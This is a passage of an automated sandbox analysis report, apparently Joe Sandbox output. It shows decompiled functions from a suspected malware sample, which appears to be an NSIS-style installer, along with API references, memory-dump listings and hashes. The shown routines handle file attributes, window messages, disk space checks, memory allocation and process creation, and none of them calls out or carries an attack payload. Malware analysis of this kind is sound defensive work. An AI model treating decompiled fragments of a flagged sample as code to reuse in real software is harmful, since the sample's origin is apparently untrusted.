                                  • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004015A3() {
                                  				int _t5;
                                  				void* _t11;
                                  				int _t14;
                                  
                                  				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                  				_t14 = _t5;
                                  				if(_t14 == 0) {
                                  					 *((intOrPtr*)(_t11 - 4)) = 1;
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                  				return 0;
                                  			}






                                  0x004015ae
                                  0x004015b4
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                  • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                  • Opcode Fuzzy Hash: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                  • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004044E5(int _a4) {
                                  				struct HWND__* _t2;
                                  				long _t3;
                                  
                                  				_t2 =  *0x433ed8; // 0x103e2
                                  				if(_t2 != 0) {
                                  					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                  					return _t3;
                                  				}
                                  				return _t2;
                                  			}





                                  0x004044e5
                                  0x004044ec
                                  0x004044f7
                                  0x00000000
                                  0x004044f7
                                  0x004044fd

                                  APIs
                                  • SendMessageW.USER32(000103E2,00000000,00000000,00000000), ref: 004044F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                  • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                  • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                  • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004044CE(int _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                  				return _t2;
                                  			}




                                  0x004044dc
                                  0x004044e2

                                  APIs
                                  • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                  • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                  • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                  • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004034E5(long _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                  				return _t2;
                                  			}




                                  0x004034f3
                                  0x004034f9

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004044BB(int _a4) {
                                  				int _t2;
                                  
                                  				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                  				return _t2;
                                  			}




                                  0x004044c5
                                  0x004044cb

                                  APIs
                                  • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2492992576-0
                                  • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                  • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                  • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                  • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E732F2B98(void* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				void* _t28;
                                  				void* _t29;
                                  				void* _t33;
                                  				void* _t37;
                                  				void* _t40;
                                  				void* _t45;
                                  				void* _t49;
                                  				signed int _t56;
                                  				void* _t61;
                                  				void* _t70;
                                  				intOrPtr _t72;
                                  				signed int _t77;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  				void* _t81;
                                  				void* _t87;
                                  				void* _t88;
                                  				void* _t89;
                                  				void* _t90;
                                  				intOrPtr _t93;
                                  				intOrPtr _t94;
                                  
                                  				if( *0x732f5050 != 0 && E732F2ADB(_a4) == 0) {
                                  					 *0x732f5054 = _t93;
                                  					if( *0x732f504c != 0) {
                                  						_t93 =  *0x732f504c;
                                  					} else {
                                  						E732F30C0(E732F2AD5(), __ecx);
                                  						 *0x732f504c = _t93;
                                  					}
                                  				}
                                  				_t28 = E732F2B09(_a4);
                                  				_t94 = _t93 + 4;
                                  				if(_t28 <= 0) {
                                  					L9:
                                  					_t29 = E732F2AFD();
                                  					_t72 = _a4;
                                  					_t79 =  *0x732f5058;
                                  					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                  					 *0x732f5058 = _t72;
                                  					E732F2AF7();
                                  					_t33 = VirtualAlloc(??, ??, ??, ??); // executed
                                  					 *0x732f5034 = _t33;
                                  					 *0x732f5038 = _t79;
                                  					if( *0x732f5050 != 0 && E732F2ADB( *0x732f5058) == 0) {
                                  						 *0x732f504c = _t94;
                                  						_t94 =  *0x732f5054;
                                  					}
                                  					_t80 =  *0x732f5058;
                                  					_a4 = _t80;
                                  					 *0x732f5058 =  *((intOrPtr*)(E732F2AFD() + _t80));
                                  					_t37 = E732F2AE9(_t80);
                                  					_pop(_t81);
                                  					if(_t37 != 0) {
                                  						_t40 = E732F2B09(_t81);
                                  						if(_t40 > 0) {
                                  							_push(_t40);
                                  							_push(E732F2B14() + _a4 + _v8);
                                  							_push(E732F2B1E());
                                  							if( *0x732f5050 <= 0 || E732F2ADB(_a4) != 0) {
                                  								_pop(_t88);
                                  								_pop(_t45);
                                  								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                  								if(__eflags == 0) {
                                  								}
                                  								asm("loop 0xfffffff5");
                                  							} else {
                                  								_pop(_t89);
                                  								_pop(_t49);
                                  								 *0x732f504c =  *0x732f504c +  *(_t89 + _t49) * 4;
                                  								asm("loop 0xffffffeb");
                                  							}
                                  						}
                                  					}
                                  					_t107 =  *0x732f5058;
                                  					if( *0x732f5058 == 0) {
                                  						 *0x732f504c = 0;
                                  					}
                                  					E732F2B42(_t107, _a4,  *0x732f5034,  *0x732f5038);
                                  					return _a4;
                                  				}
                                  				_push(E732F2B14() + _a4);
                                  				_t56 = E732F2B1A();
                                  				_v8 = _t56;
                                  				_t77 = _t28;
                                  				_push(_t68 + _t56 * _t77);
                                  				_t70 = E732F2B26();
                                  				_t87 = E732F2B22();
                                  				_t90 = E732F2B1E();
                                  				_t61 = _t77;
                                  				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                  					_push( *((intOrPtr*)(_t70 + _t61)));
                                  				}
                                  				_push( *((intOrPtr*)(_t87 + _t61)));
                                  				asm("loop 0xfffffff1");
                                  				goto L9;
                                  			}

























                                  0x732f2ba8
                                  0x732f2bb9
                                  0x732f2bc6
                                  0x732f2bda
                                  0x732f2bc8
                                  0x732f2bcd
                                  0x732f2bd2
                                  0x732f2bd2
                                  0x732f2bc6
                                  0x732f2be3
                                  0x732f2be8
                                  0x732f2bee
                                  0x732f2c32
                                  0x732f2c32
                                  0x732f2c37
                                  0x732f2c3c
                                  0x732f2c42
                                  0x732f2c44
                                  0x732f2c4a
                                  0x732f2c57
                                  0x732f2c59
                                  0x732f2c5e
                                  0x732f2c6b
                                  0x732f2c7e
                                  0x732f2c84
                                  0x732f2c8a
                                  0x732f2c8b
                                  0x732f2c91
                                  0x732f2c9d
                                  0x732f2ca3
                                  0x732f2cab
                                  0x732f2cac
                                  0x732f2caf
                                  0x732f2cba
                                  0x732f2cbc
                                  0x732f2cc8
                                  0x732f2cce
                                  0x732f2cd6
                                  0x732f2d02
                                  0x732f2d03
                                  0x732f2d05
                                  0x732f2d09
                                  0x732f2d09
                                  0x732f2d10
                                  0x732f2ce6
                                  0x732f2ce6
                                  0x732f2ce7
                                  0x732f2cf5
                                  0x732f2cfe
                                  0x732f2cfe
                                  0x732f2cd6
                                  0x732f2cba
                                  0x732f2d12
                                  0x732f2d19
                                  0x732f2d1b
                                  0x732f2d1b
                                  0x732f2d34
                                  0x732f2d42
                                  0x732f2d42
                                  0x732f2bf9
                                  0x732f2bfa
                                  0x732f2bff
                                  0x732f2c03
                                  0x732f2c08
                                  0x732f2c1c
                                  0x732f2c1d
                                  0x732f2c1e
                                  0x732f2c20
                                  0x732f2c25
                                  0x732f2c27
                                  0x732f2c27
                                  0x732f2c2a
                                  0x732f2c30
                                  0x00000000

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000), ref: 732F2C57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: c76df63ad78f7a5e354b38ed14316021312f5daa46ca463adf1ba981abf39515
                                  • Instruction ID: 43721e4534d68a45ff0a5d5ead1ba0ef4eb4d516a057b2ff3ef33af73b546d07
                                  • Opcode Fuzzy Hash: c76df63ad78f7a5e354b38ed14316021312f5daa46ca463adf1ba981abf39515
                                  • Instruction Fuzzy Hash: 1041A5BA50030FEFEB11EF65D948B59B779EB4A360F30C42AE809C6240D67995C0EBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00401FA4(void* __ecx) {
                                  				void* _t9;
                                  				intOrPtr _t13;
                                  				void* _t15;
                                  				void* _t17;
                                  				void* _t20;
                                  				void* _t22;
                                  
                                  				_t17 = __ecx;
                                  				_t19 = E00402DA6(_t15);
                                  				E0040559F(0xffffffeb, _t7); // executed
                                  				_t9 = E00405B20(_t19); // executed
                                  				_t20 = _t9;
                                  				if(_t20 == _t15) {
                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                  				} else {
                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                  						_t13 = E004069B5(_t17, _t20);
                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                  							if(_t13 != _t15) {
                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                  							}
                                  						} else {
                                  							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                  						}
                                  					}
                                  					_push(_t20);
                                  					CloseHandle();
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                  				return 0;
                                  			}









                                  0x00401fa4
                                  0x00401faa
                                  0x00401faf
                                  0x00401fb5
                                  0x00401fba
                                  0x00401fbe
                                  0x0040292e
                                  0x00401fc4
                                  0x00401fc7
                                  0x00401fca
                                  0x00401fd2
                                  0x00401fe1
                                  0x00401fe3
                                  0x00401fe3
                                  0x00401fd4
                                  0x00401fd8
                                  0x00401fd8
                                  0x00401fd2
                                  0x00401fea
                                  0x00401feb
                                  0x00401feb
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00403418), ref: 004055FA
                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 0040560C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                    • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                                    • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                    • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                    • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 2972824698-0
                                  • Opcode ID: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                                  • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                  • Opcode Fuzzy Hash: f0af5b3ae2630faf6cf52e0a27c7d75959b1b33dafccb85cc06ce083e5b7ca2f
                                  • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E732F12BB() {
                                  				void* _t3;
                                  
                                  				_t3 = GlobalAlloc(0x40,  *0x732f506c +  *0x732f506c); // executed
                                  				return _t3;
                                  			}




                                  0x732f12c5
                                  0x732f12cb

                                  APIs
                                  • GlobalAlloc.KERNELBASE(00000040,?,732F12DB,?,732F137F,00000019,732F11CA,-000000A0), ref: 732F12C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: AllocGlobal
                                  • String ID:
                                  • API String ID: 3761449716-0
                                  • Opcode ID: 3bb8347f2e34a9ab421e08f772f4b371594737508ea37a1392b703b5a6c6d7b8
                                  • Instruction ID: b61227c43e2151af2ff0ea932d8b83214383a922b79cbbb8feb8a1cd4d9908a3
                                  • Opcode Fuzzy Hash: 3bb8347f2e34a9ab421e08f772f4b371594737508ea37a1392b703b5a6c6d7b8
                                  • Instruction Fuzzy Hash: 37B012B2A00011FFEE00AB65CC0EF343294E704311F24C004FA08C0180C16049009934
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				long _v16;
                                  				long _v20;
                                  				long _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				long _v36;
                                  				char _v40;
                                  				unsigned int _v44;
                                  				signed int _v48;
                                  				WCHAR* _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				WCHAR* _v72;
                                  				void _v76;
                                  				struct HWND__* _v80;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t82;
                                  				long _t87;
                                  				short* _t89;
                                  				void* _t95;
                                  				signed int _t96;
                                  				int _t109;
                                  				signed short _t114;
                                  				signed int _t118;
                                  				struct HWND__** _t122;
                                  				intOrPtr* _t138;
                                  				WCHAR* _t146;
                                  				intOrPtr _t147;
                                  				unsigned int _t150;
                                  				signed int _t152;
                                  				unsigned int _t156;
                                  				signed int _t158;
                                  				signed int* _t159;
                                  				signed int* _t160;
                                  				struct HWND__* _t166;
                                  				struct HWND__* _t167;
                                  				int _t169;
                                  				unsigned int _t197;
                                  
                                  				_t156 = __edx;
                                  				_t82 =  *0x42c240; // 0x80bf74
                                  				_v32 = _t82;
                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                  				if(_a8 == 0x40b) {
                                  					E00405B81(0x3fb, _t146);
                                  					E004067C4(_t146);
                                  				}
                                  				_t167 = _a4;
                                  				if(_a8 != 0x110) {
                                  					L8:
                                  					if(_a8 != 0x111) {
                                  						L20:
                                  						if(_a8 == 0x40f) {
                                  							L22:
                                  							_v8 = _v8 & 0x00000000;
                                  							_v12 = _v12 & 0x00000000;
                                  							E00405B81(0x3fb, _t146);
                                  							if(E00405F14(_t186, _t146) == 0) {
                                  								_v8 = 1;
                                  							}
                                  							E0040653D(0x42b238, _t146);
                                  							_t87 = E0040690A(1);
                                  							_v16 = _t87;
                                  							if(_t87 == 0) {
                                  								L30:
                                  								E0040653D(0x42b238, _t146);
                                  								_t89 = E00405EB7(0x42b238);
                                  								_t158 = 0;
                                  								if(_t89 != 0) {
                                  									 *_t89 = 0;
                                  								}
                                  								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                  									goto L35;
                                  								} else {
                                  									_t169 = 0x400;
                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                  									asm("cdq");
                                  									_v48 = _t109;
                                  									_v44 = _t156;
                                  									_v12 = 1;
                                  									goto L36;
                                  								}
                                  							} else {
                                  								_t159 = 0;
                                  								if(0 == 0x42b238) {
                                  									goto L30;
                                  								} else {
                                  									goto L26;
                                  								}
                                  								while(1) {
                                  									L26:
                                  									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                  									if(_t114 != 0) {
                                  										break;
                                  									}
                                  									if(_t159 != 0) {
                                  										 *_t159 =  *_t159 & _t114;
                                  									}
                                  									_t160 = E00405E58(0x42b238);
                                  									 *_t160 =  *_t160 & 0x00000000;
                                  									_t159 = _t160;
                                  									 *_t159 = 0x5c;
                                  									if(_t159 != 0x42b238) {
                                  										continue;
                                  									} else {
                                  										goto L30;
                                  									}
                                  								}
                                  								_t150 = _v44;
                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                  								_v44 = _t150 >> 0xa;
                                  								_v12 = 1;
                                  								_t158 = 0;
                                  								__eflags = 0;
                                  								L35:
                                  								_t169 = 0x400;
                                  								L36:
                                  								_t95 = E00404E27(5);
                                  								if(_v12 != _t158) {
                                  									_t197 = _v44;
                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                  										_v8 = 2;
                                  									}
                                  								}
                                  								_t147 =  *0x433edc; // 0x81267e
                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                  									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                  									if(_v12 == _t158) {
                                  										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                  									} else {
                                  										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                  									}
                                  								}
                                  								_t96 = _v8;
                                  								 *0x434fa4 = _t96;
                                  								if(_t96 == _t158) {
                                  									_v8 = E0040140B(7);
                                  								}
                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                  									_v8 = _t158;
                                  								}
                                  								E004044BB(0 | _v8 == _t158);
                                  								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                  									E004048E3();
                                  								}
                                  								 *0x42d258 = _t158;
                                  								goto L53;
                                  							}
                                  						}
                                  						_t186 = _a8 - 0x405;
                                  						if(_a8 != 0x405) {
                                  							goto L53;
                                  						}
                                  						goto L22;
                                  					}
                                  					_t118 = _a12 & 0x0000ffff;
